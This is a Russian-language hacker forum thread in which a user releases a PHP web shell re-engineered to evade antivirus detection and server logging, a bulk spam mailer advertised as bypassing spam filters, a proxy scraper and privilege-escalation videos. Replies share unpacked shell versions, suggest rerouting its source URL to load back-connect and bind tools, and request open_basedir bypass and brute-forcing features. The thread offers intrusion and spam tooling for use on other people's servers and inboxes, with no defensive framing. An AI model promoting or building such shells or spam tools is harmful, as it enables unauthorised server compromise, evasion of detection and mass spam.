Релизы от madnet

Discussion in 'Избранное' started by madnet, 9 Apr 2006.

  1. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    904
    Likes Received:
    343
    Reputations:
    423
    Итак, прошу прощение за то, что в последнее время, вроде как, ничего нового от меня не поступало.
    Наверстываю упущенное:


    1) Список проксей
    Наконец-то доработал скрипт сбора проксей.
    Каждый час берет публичные прокси из 3х источников, проверяет валидность, скорость соединение, страну и т.д. Старые удаляет, а свежие сохраняет в БД, так что кому на быструю руку нужны соксы, милости прошу
    http://madnet.name/tools/proxy/

    2) VIDEO
    Повышение прав, используя MySQL
    Скорее я его писал для тренировки в обработке видео, но тем не менее.
    Никак не могу выловить Zadoxik'а, поэтому надеюсь, он закинет видео отсюда
    Качаем, смотри, наслаждаемся
    http://madnet.name/files/3/14.html 1.7mb
    Старенькое видео об xss в set-cms
    http://madnet.name/files/3/13.html 2mb

    3) с99madshell
    Наверное, самый приятный релиз.
    Какой шелл вы юзаете?
    r57shell? потому что он гоняет все в посте?
    Так ведь он очень неудобен, да и в последних версиях он все больше использует гет+баннеры+графика, в общем, ужас.
    Из всего многообразия я для себя подобрал c99shell.
    Что бы кто ни говорил он самый удобный, но есть много недочетов.

    a) Картинки, запустите скрипт с включенной графикой в браузере, и вы подарили админу в лог минимум 100 строчек запросов.
    b) Антивирусы, шеллы не должны палиться антивирусниками
    c) Размер, 162кб для шелла, это согласитесь перебор.
    d) GET, просто самый огромный недостаток, все данные посылаются method=GET

    Итак, после некоторых мучений представляю полностью переделанный шелл.
    a) Никакой лишней графики
    b) Скрипт полностью переписан+тело закодировано, так что забудем про антивирусы
    c) Удалено все лишнее+сжат, размер теперь 44кб сделал все что смог
    в) Никакого GET, абсолютно все запросы гоняются методом POST, что позволит сделать наш шелл в системе слабо заметным.
    Качаем отсюда
    http://madnet.name/files/1/10.html

    4) TextForVideo
    Небольшая програмка для записи видео. Суть ее в следующем вы пишете в ней свой коментарий, а потом по нажатию горячей клавиши она вписывает коментарий в блокнот. Для того что-бы соответствовать событиям я сделал построчное разбиение, т.е, на каждой новой строке проги вы записываете фразу, которая должна быть выведена за раз.
    К примеру:
    Привет меня завут madnet сегодня я... ищем жертву.
    Будем работать с www.xxx.xxx

    Далее мы нажимаем на кнопку Запустить редактор
    Будет загружен Блокнот с вашим именем в качестве заголовка, которое вы выберете в поле Заголовок редактора
    Потом сворачиваем программу, она исчезает в трей.
    Теперь можно начинать запись.
    Все что остается сделать это нажимать на HotKey, которую вы установите в настройке, по умолчанию F9

    Нажимаем ее в блокноте печатается надпись
    Привет меня завут madnet сегодня я... ищем жертву.
    Теперь вы делаете че там вам надо ищете и т.д., нашли жмем снова HOTKEY блокнот автоматов выносится на первый план и в нем появляется
    Будем работать с www.xxx.xxx
    Ну и так далее по тексту.
    http://madnet.name/files/2/12.html

    5) Mailer
    Не подумайте что я спамер, просто был заказ написать спам скрипт.

    Вот мой spam скрипт,
    написан на php,
    работает через sendmail

    Возможности:
    Интеллектуальная рандомная генерация полей
    Рассылка с аттачем
    plane и html тип
    работа как с формами так и с файлами
    и т.д.

    Чел тестил на tut.by и yahoo.com
    разослал по 1 000 000 писем.
    Письма не были определены как спам.
    http://madnet.name/files/1/3.html

    Обо всех недочетах или пожеланиях пишем здесь, в ПМ или ICQ.

    Надеюсь, хоть что-то полезное вы здесь нашли для себя.

    С уважением madnet.
     
    #1 madnet, 9 Apr 2006
    Last edited: 19 Sep 2007
    12 people like this.
  2. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,761
    Likes Received:
    4
    Reputations:
    0
    Мне понравился здесь список типов атак http://securityprobe.net/docs/2.html
    Может выложить его на античате? Автор кто? Согласен?
     
  3. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    904
    Likes Received:
    343
    Reputations:
    423
    Algol, выкладывай, только в качестве автора укажи пожалуйста http://securityprobe.net
     
  4. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,761
    Likes Received:
    4
    Reputations:
    0
    Ок, только кое-что придется подредактировать, ибо я не со всем согласен в этой статье :)
     
  5. Zitt

    Zitt Elder - Старейшина

    Joined:
    7 May 2006
    Messages:
    791
    Likes Received:
    270
    Reputations:
    59
    madnet выложи гденить шелл в txt чтоб удобно юзать было. Типа как rst (http://rst.void.ru/download/r57shell.txt)
     
    1 person likes this.
  6. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,138
    Likes Received:
    436
    Reputations:
    90
    :) вот я за него сделал http://sec-hack.org/soft/madshell.txt
     
    2 people like this.
  7. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    946
    Likes Received:
    427
    Reputations:
    508
    Специально для поклонников шелла Маднета!

    С разрешения автора выкладываю два скрипта для распаковки\запаковки шелла, а также шелл в распакованном виде.

    http://sec-123.narod.ru/shells/c99madnet/for_decript_c99.php
    http://sec-123.narod.ru/shells/c99madnet/for_cript_c99.php
    http://sec-123.narod.ru/shells/c99madnet/c99madshell_no_cript.zip


    Теперь желающие смогут поправить его на свой вкус.
    Например, изменить константу
    Code:
    $c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
    на свой сайт и грузить тулзы бэк-бинд-пайпа, которые не работают в оригинальном шелле.

    Также, Вы можете изменить алгоритм шифрования, или изменить стандартные 11 сжатий на , скажем, 150 :)

    Ах, вам не нравится шел Маднета? Вы уважаете шелл РСТ ?
    Ну, чтож. Там принцип сжатия аналогичен, теперь вы сможете сконструировать свой рст-шел под себя, а затем распаковать и вырезать гадские счётчики! :)
     

    Attached Files:

    1 person likes this.
  8. karabym

    karabym Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    196
    Likes Received:
    30
    Reputations:
    1
    madnet

    Твой шелл рулез однозначно!!!

    Может с нуля забабацаешь шелл так сказать свой запатентованый :)
     
  9. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    904
    Likes Received:
    343
    Reputations:
    423
    нет в этом смысла, но возможно, если мне хватит сил и времени, вскоре появится что-то новенькое и интересное в этом направлении!
     
    2 people like this.
  10. karabym

    karabym Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    196
    Likes Received:
    30
    Reputations:
    1
    ОК юэсей :) будем ждать а ждать мы умеем :)
     
    1 person likes this.
  11. SQLHACK

    SQLHACK Остались только слоны

    Joined:
    27 Sep 2006
    Messages:
    437
    Likes Received:
    372
    Reputations:
    407
    Вот пользовал я год с99. и понял имхо что бэк коннект и бинд должны быть всегда внутри шелла. это очень часто спасает, а увеличивает скрипт на 3кб.
    и ещё очень бы хотелось запихать туда возможность обхода open_basedir.

    и вообще я лично не понимаю нах бекконнект убирать из скрипта?
    чтоб юзер потом сам скачал, раскодировал, доделывал, кодировал,?

    это бл.. игра какая то новая такая ?
    под названием "после сборки обточить напильником"

    чесслово .Маразм
     
    _________________________
    #11 SQLHACK, 3 Apr 2007
    Last edited: 3 Apr 2007
    1 person likes this.
  12. GlobaL

    GlobaL Banned

    Joined:
    21 Feb 2007
    Messages:
    111
    Likes Received:
    65
    Reputations:
    -18
    Когда запускаю твою спамилку точнее просто открываею его на сайте вылазит во что
    Code:
    Cannot set time limit in safe mode in /home/global/domains/домен/public_html/files/madsp.php on line 8
    Но прога роботает, пишет чьл разослано.
     
  13. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    904
    Likes Received:
    343
    Reputations:
    423

    Для того, что бы скрипт работал столько, сколько нужно, надо что бы на сервере был выключен Safe mode
     
  14. .Slip

    .Slip Banned

    Joined:
    16 Jan 2006
    Messages:
    1,593
    Likes Received:
    966
    Reputations:
    783
    У тебя тут очепятка:
    http://madnet.name/tools/madss/

    :)
     
    1 person likes this.
  15. Knight_of_Darkness

    Knight_of_Darkness Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    71
    Likes Received:
    68
    Reputations:
    24
    а зеркала есть? +есть несколько идей насчет доработки шелла, отпишу попозже
     
  16. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    904
    Likes Received:
    343
    Reputations:
    423
    Зеркал нет и пока не вижу никакой необходимости в них.
     
  17. maximum

    maximum Elder - Старейшина

    Joined:
    2 Apr 2007
    Messages:
    72
    Likes Received:
    19
    Reputations:
    5
    Не качаеться!
    Что то с сайтом, или это только у меня так?
     
  18. madnet

    madnet Умиротворенный

    Joined:
    9 Dec 2004
    Messages:
    904
    Likes Received:
    343
    Reputations:
    423
    Доступ восстановлен.
     
    1 person likes this.
  19. Scipio

    Scipio Members of Antichat

    Joined:
    2 Nov 2006
    Messages:
    726
    Likes Received:
    537
    Reputations:
    190
    мде... сейчас вот нужно было файлик один посмотреть, шелл залил, а посмотреть не смог, т.к. имя файла плюсенг содержит... это наверно с тех пор осталось, когда с99 с Гет запросами работал (ну всмысле менял плюсенг на %2b)... надо бы исправить

    да и так недочеты есть, например файло сохраняет в туже папку где и шелл, а это имхо бывает критично, например залил я шелл через админку ну или еще как нить шелл залился а когда я его открываю, прав на запись (из шелла) в эту папку нет, а там еще и сейфмоде докучи... вобщем вот... а еще Sql клиент содержит недочеты

    А в целом хорошо, сделано все через пост, картинок нет, которые нах ненужны были

    вобщем если все доработать (ну там баги некторые устранить, тулзы типа бэкконект в шелл встроить, брутер опять же с обратными логинами сделать, можно еще и мускул брут сделать) хотя понимаю, что объять необъятное нельзя и всем неугодишь, буду только им пользоваться
     
    _________________________
    #19 Scipio, 3 Nov 2007
    Last edited: 3 Nov 2007
  20. 1SeTh

    1SeTh Elder - Старейшина

    Joined:
    17 Feb 2006
    Messages:
    165
    Likes Received:
    18
    Reputations:
    5
    Madnet

    Спасибо за спам скрипт.
    Действительно письма не определяются как спам. Но вот беда тип html не работает. До адресата доходить теги в открытом виде.
     
Loading...